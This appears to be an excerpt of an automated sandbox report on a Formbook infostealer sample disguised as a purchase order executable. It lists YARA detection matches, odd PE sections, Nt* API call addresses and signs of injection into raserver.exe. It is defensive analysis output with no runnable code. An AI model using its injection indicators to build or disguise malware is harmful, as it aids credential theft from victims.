          Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          PE file contains section with special charsShow sources
          Source: PO 367628usa.exeStatic PE information: section name: ^8+S|rz
          PE file has nameless sectionsShow sources
          Source: PO 367628usa.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_004182EC NtClose,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0190B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0190A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0190AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0190A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0190A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01909670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C1A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_009281C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_009282F0 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00928270 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_009283A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_009281BC NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_009282EC NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0092826A NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0092839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD2DB0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD2520
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD4620
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD37E0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DDB7E0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD60D0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD54C0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD60E0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD2499
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DDA888
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD6C08
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD6DC1
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DDB1F8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD6999
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD45B7
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD69A8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD455B
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD1908
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD3249
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DDA218
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD6BF8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD6758
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_00DD6748
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E6508
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E3C48
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E5C00
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E07B8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E5E24
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E8620
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E0040
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E58D3
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EA3E3
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E9208
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E9A30
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ECD48
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ECD58
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED5D9
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED5E8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E64FB
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EB731
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EC1C0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E9183
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EC1B0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED048
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED851
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED860
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054E5BF0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED3A1
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054ED3B0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_054EDA68
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C6B648
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C6459B
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C68DAE
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C645A8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C64553
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C63168
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C68D31
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C630F0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C64099
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C640A8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C60040
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C60007
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C66B80
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C66B90
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C637B0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C68B50
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C68758
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C64ED8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 0_2_05C64E78
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00401027
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041C82E
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041A2A6
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041BABD
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00408C60
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00408C1A
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041B504
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0041CE2B
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018CF900
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E4120
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DB090
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F20A0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019920A8
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019928EC
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01981002
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199E824
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018FEBB0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019803DA
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198DBD2
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01992B28
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019922AE
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018F2581
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_019925DD
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018DD5E0
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01992D07
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018C0D20
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01991D55
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018D841F
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198D466
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0199DFCE
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01991FF1
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_01992EF7
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_0198D616
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: 5_2_018E6E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BE841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9D466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C02581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BED5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BD0D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF6E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CADFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BEB090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C020A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C91002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CAE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BF4120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04BDF900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C8FA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C903DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C9DBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04C0EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04CA2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0092C82E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0092A2A6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00918C1A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00918C60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00912D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0092B504
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0092CE2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00912FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04BDB150 appears 45 times
          Source: C:\Users\user\Desktop\PO 367628usa.exeCode function: String function: 018CB150 appears 45 times
          Source: PO 367628usa.exeBinary or memory string: OriginalFilename vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000000.00000002.348314984.0000000004F80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000000.00000002.346748080.0000000002EB0000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000000.00000002.348709437.0000000005180000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000000.00000002.348407890.00000000050A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PO 367628usa.exe
          Source: PO 367628usa.exeBinary or memory string: OriginalFilename vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000002.00000002.340682480.00000000000D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
          Source: PO 367628usa.exeBinary or memory string: OriginalFilename vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000003.00000000.341450128.00000000003F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
          Source: PO 367628usa.exeBinary or memory string: OriginalFilename vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000004.00000002.342956819.0000000000402000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
          Source: PO 367628usa.exeBinary or memory string: OriginalFilename vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000005.00000002.390665694.00000000019BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000005.00000002.389153954.0000000000E82000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
          Source: PO 367628usa.exe, 00000005.00000002.391187229.00000000034F9000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs PO 367628usa.exe
          Source: PO 367628usa.exeBinary or memory string: OriginalFilenameCspAlgorithmType.exeF vs PO 367628usa.exe
          Source: PO 367628usa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
